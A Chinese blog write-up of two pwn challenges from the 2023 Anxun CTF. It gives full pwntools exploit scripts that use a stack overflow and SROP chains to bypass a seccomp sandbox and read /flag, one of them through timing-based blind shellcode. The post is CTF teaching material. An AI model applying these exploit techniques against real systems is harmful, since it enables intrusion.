2023年安洵杯_pwn_个人writeup

于 2023-12-25 21:06:21 发布
阅读量439 收藏 11
点赞数 9
分类专栏: 比赛wp pwn_writeup 文章标签: 网络安全 安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xy1458214551/article/details/135209140
版权

本次安洵杯有三个题,最后一个QQ的题目由于放题的时候已经出门了,所以没有拿到附件。(看了wp感觉目前的我还不太会…真的很需要努力!)

第一道side_channels其实思路非常常规,比赛的时候因为下午要出去玩,看到没write就…没看了…复现的时候直接秒了

side_channels(基于时间盲注)

常规侧信道,沙箱,可以用openreadmprotectrt_sigreturn。然后是常规栈溢出,栈溢出前可以在bss段写值。

那么思路非常明确了,首先可以通过sropbss上写rop链,先open,再read,然后通过mprotect改变一下bss段的执行权限。接着继续写shellcode,基于时间盲注爆破flag即可。

from pwn import *
from LibcSearcher import *

filename = './chall'
context(arch='amd64')
local = 1
all_logs = []
elf = ELF(filename)
# libc = ELF('')


def debug():
    for an_log in all_logs:
        success(an_log)
    pid = util.proc.pidof(sh)[0]
    gdb.attach(pid, 'b *0x401447')
    pause()

def leak_info(name, addr):
    output_log = '{} => {}'.format(name, hex(addr))
    all_logs.append(output_log)
    success(output_log)

bss_buf = 0x404060
leave_ret = 0x401446
srop_rax = 0x401193
syscall_addr = 0x40118a

chars_dict = '!\{\}_abcdefghijklmnopqrstuvwxyz0123456789'
result = ''
i = 0
while True:

    for char in chars_dict:
        if local:
            sh = process(filename)
        else:
            sh = remote('node4.buuoj.cn', )
        frame = SigreturnFrame()
        frame.rax = constants.SYS_open
        frame.rdi = bss_buf
        frame.rsi = 0
        frame.rdx = 0
        frame.rsp = bss_buf + 0x120
        frame.rbp = bss_buf + 0x120
        frame.rip = syscall_addr

        rop_chain = b'/flag\x00aa' + p64(srop_rax) + p64(syscall_addr) + bytes(frame)

        frame = SigreturnFrame()
        frame.rax = constants.SYS_read
        frame.rdi = 3
        frame.rsi = bss_buf + 0x9a0
        frame.rdx = 0x30
        frame.rsp = bss_buf + 0x240
        frame.rbp = bss_buf + 0x240
        frame.rip = syscall_addr

        rop_chain = rop_chain.ljust(0x120, b'\x00') + p64(0xdeadbeaf) + p64(srop_rax) + p64(syscall_addr) + bytes(frame)

        frame = SigreturnFrame()
        frame.rax = constants.SYS_mprotect
        frame.rdi = 0x404000
        frame.rsi = 0x1000
        frame.rdx = 7
        frame.rsp = bss_buf + 0x360
        frame.rbp = bss_buf + 0x360
        frame.rip = syscall_addr

        rop_chain = rop_chain.ljust(0x240, b'\x00') + p64(0xdeadbeaf) + p64(srop_rax) + p64(syscall_addr) + bytes(frame)

        flag_addr = 0x404A00
        shellcode = asm('''mov rcx, 0x404a00
        mov dl, byte ptr [rcx + %d]
        cmp dl, %d
        jz $-3
        ''' % (i, ord(char)))
        rop_chain = rop_chain.ljust(0x360, b'\x00') + p64(0xdeadbeaf) + p64(bss_buf + 0x370) + shellcode

        sh.sendafter(b'easyhack\n', rop_chain)
        payload = b'a'*0x2a + p64(bss_buf) + p64(leave_ret)
        sh.sendafter(b'Do u know what is SUID?\n', payload)
        if not sh.can_recv(timeout=3):
            result += char
            i += 1
            print(result)
            if char == ord('}'):
                exit(0)
            sh.close()
            continue
        sh.close()

seccomp(常规srop)

非常常规的白给srop,和上一道题的区别在于给了write系统调用,直接梭哈

from pwn import *
from LibcSearcher import *

filename = './chall'
context(log_level='debug', arch='amd64')
local = 0
all_logs = []
elf = ELF(filename)
# libc = ELF('')

if local:
    sh = process(filename)
else:
    sh = remote('47.108.206.43', 30079)

def debug():
    for an_log in all_logs:
        success(an_log)
    pid = util.proc.pidof(sh)[0]
    gdb.attach(pid)
    pause()

def leak_info(name, addr):
    output_log = '{} => {}'.format(name, hex(addr))
    all_logs.append(output_log)
    success(output_log)

bss_buf = 0x404060
leave_ret = 0x40143C
srop_rax = 0x401193
syscall_addr = 0x401186
syscall_addr_ret = 0x40118a

frame = SigreturnFrame()
frame.rax = constants.SYS_open
frame.rdi = bss_buf
frame.rsi = 0
frame.rdx = 0
frame.rip = syscall_addr_ret
frame.rbp = bss_buf + 0x120
frame.rsp = bss_buf + 0x120

rop_chain = b'/flag\x00aa' + p64(srop_rax) + p64(syscall_addr_ret) + bytes(frame)

frame = SigreturnFrame()
frame.rax = constants.SYS_read
frame.rdi = 3
frame.rsi = 0x405060
frame.rdx = 0x30
frame.rip = syscall_addr_ret
frame.rsp = bss_buf + 0x240

rop_chain = rop_chain.ljust(0x120, b'\x00') + p64(0xdeadbeaf) + p64(srop_rax) + p64(syscall_addr_ret) + bytes(frame)

frame = SigreturnFrame()
frame.rax = constants.SYS_write
frame.rdi = 1
frame.rsi = 0x405060
frame.rdx = 0x30
frame.rip = syscall_addr_ret
rop_chain = rop_chain.ljust(0x240, b'\x00') + p64(0xdeadbeaf) + p64(srop_rax) + p64(syscall_addr_ret) + bytes(frame)

sh.sendafter('easyhack\n', rop_chain)
payload = b'a'*0x2a + p64(bss_buf) + p64(leave_ret)
# debug()
sh.send(payload)
# pause()
sh.recvuntil(b'\x0a')
print(sh.recvuntil(b'\x0a', drop=True).decode('utf-8'))
LtfallQwQ
关注
  • 9
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
安洵-game-wp
令则
12-09 1201
game 安洵2019逆向 链接:https://pan.baidu.com/s/1vICnEqYfSezXUiTJU6C9TA 提取码:d9m7 题目的文件和idb分析文件和写出的python文件都给出了 首先进入函数发现时ollvm, 这次的分析是直接看那个伪代码,比以前好很多了,就简单写下分析的思路方法,然后后面的分析结果直接写成了python代码,同时的idb文件会同样在附赠文件中...
安洵RE(PE_Debug)
11-29
安洵RE(PE_Debug) 拿到题目名字已给出提示PE结构OD打开查看一下字符串
[STCTF 安洵4 2023] 3c1c1m
weixin_52640415的博客
06-11 898
printf argv链, 连分式求p ,数独
[安洵 2019]easy_serialize_php
zxnimud5的专栏
09-13 138
上来就给源码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION){ unset($_SESSIO
2022-安洵
qq_53142368的博客
11-29 907
2022-安洵
赣网2021_pwn1.rar
12-11
赣网2021 pwn1 bin ctf
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
ARM7下PWN接口的使用源码,包含C语言及汇编
赣网2021_pwn2.rar
12-11
赣网2021 pwn1 bin ctf
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
AVR系列单片机Mage8PWM脉冲输出程序
PWN.rar_PWN
09-24
本代码是在Keil uVision3环境下使用c语言编写的。功能是使用片内pgaPWN输出占空比可变的方波。
BMZCTF 2018 安洵 boooooom
qq_26243045的博客
11-26 360
下载压缩包后发现360提示有加密的压缩文件,所以先用Advanced Archive Password Recovery爆破一下。 爆破出密码:3862 查看解压缩的password.py import base64 import hashlib f = open("password.txt",'r') password = f.readline() b64_str = base64.b64encode(password.encode('utf-8')) hash = hashlib.md5()
安洵-crackme-wp
令则
12-02 2371
crackme 这是安洵2019的逆向题 链接:https://pan.baidu.com/s/16fb_-L-dE5knUPzkSFU5rQ 提取码:z405 文章目录crackme逆向分析逆向脚本: 逆向分析 首先在ida并没有发现什么加密位置 下面的check函数如下: 只是简单的判定,其中的str2为明文,而str1却是从未出现的量。 (其实看到这个就想到了base64,而且可以...
安洵 --writeup
Kr的博客
11-26 2952
web: only d0g3er can see flag 这个打开一个是一个海洋cms,通过百度,在search.php有一个代码执行漏洞 直接构造payload: http://138.68.2.14/seacms/search.php?searchtype=5 POST: searchword=searchword={if{searchpage:year}&amp;year=:e{...
安洵2023wp - ukfc战队
qq_59700927的博客
06-11 1840
2. 根据消息头 "Server: Werkzeug/1.0.1 Python/3.11.3"、 "/eval"回显是列表格式等判断是 "python flask", 且 "/eval" 使用了 "os.listdir()"函数,5.再看 "/sEcR@t_n@Bodyknow.php" 传空参可以得到两个函数 "mysqli_query()" 和 "mysqli_fetch_all()", 试着写马传了一下, 然后sql日志写马。file=../app.py" 均被 "杂鱼"
BUUCTF-[安洵 2019]crackMe1
weixin_61154173的博客
02-20 1046
sm4加密所以就是当messageboxA后发生异常,触发了 AddVectoredExceptionHandler()函数异常处理,调用了Handler。如果参数为零,则处理程序是要调用的最后一个处理程序。所以整体逻辑:str1即用户输入经过sm4加密,base64表的大小写互换与移位后的base加密结果与str2两两互换相等。调用此函数后,如果在未调试的进程中发生异常,并且异常会将其设置为未处理的异常筛选器,该筛选器将调用。指定显示按钮的数目及形式,使用的图标样式,缺省按钮是什么以及消息框的强制回应等。
BUUCTF [安洵 2019]easy_web
zgwz123456的博客
02-11 680
进入到靶机中,在url里我们看见了两个参数一个是img,一个是cmd,显然cmd是给我们的一个后门函数,但是肯定没有这么简单,img则对应左上角的这张图片,让我们看一下源代码 这里面是图片base64编码的结果,然后我们把img参数里的base64进行解码,首先base64解码两次,再将得到的16进制转成字符串 这里得到555.png应该是左上角图片的名字,然后我们需要得到index.php的源码,看看它在干嘛,同样我们将index.php转成16进制,再进行base64编码2次,得到以下代码 &lt.
【2020安洵】EasyCM WriteUp
古月浪子的博客
12-17 478
这题从早上9点开始,做了快3小时,最后被人领先8分钟拿了一血,只拿到一个二血,呜呜呜/(ㄒoㄒ)/~~ 这题IDA有点白给,直接上x32dbg动调 可以看到要比较的字符串 我输入的是111d0g,经过某种加密以后变成了OOOBhKaT 前面有判断输入是不是3的倍数,不是则用-补齐的操作 推测是3位一组,一组输出4个字符,有点像base64 加密操作在这个函数里,会调用length/3次,每次输出4个字符 这个函数是动态解密的,而且dump下来后idapython写IDA里patch后也没法F5,懒得修花
安洵 RE CrackMe的WP
Zarcs_233的博客
12-01 1083
由于当天有事没参加,只能拿题看看了,觉得这道题很有意思。 稍微写写。 IDA打开,通过字符串定位到main函数 然后开始动调,到达红色位置出现了神奇的一幕,弹出的窗口不是Exception而是hook,挺有意思的,让后只能F7进去看看了。 hook技术类似于patch,将系统函数的调用执行流程给改掉了,这里似乎用的不是inline hook,用hook来隐藏代码也是绝了 F7 通过动态调试,可以看...
2020安洵——EasyCM WriteUP
qq_43547885的博客
01-23 520
文章目录概述详细反调花指令SMC写脚本解密 最近犯懒,没看新题,想起来之前安洵做过一道 SMC + 反调试的题,当时是动调 + 瞎蒙做出来的,今天来整理一下里面的知识点 题目链接:https://github.com/D0g3-Lab/i-SOON_CTF_2020/tree/main/re/EasyCM 需要用到的 IDA 插件(能够简化大量操作):IDACode & IDAPython 概述 入口点: 这题用到了 TLSCallback 在 main 函数前执行各种解密操作, 在 IDA
xdctf2015_pwn200
最新发布
09-03
xdctf2015_pwn200是一道CTF比赛中的题目,是一个二进制漏洞利用题目。从代码中可以看出,它利用了一个栈溢出漏洞来实现攻击。在攻击过程中,首先使用write函数的got地址来泄露出libc中write函数的真实地址,然后通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值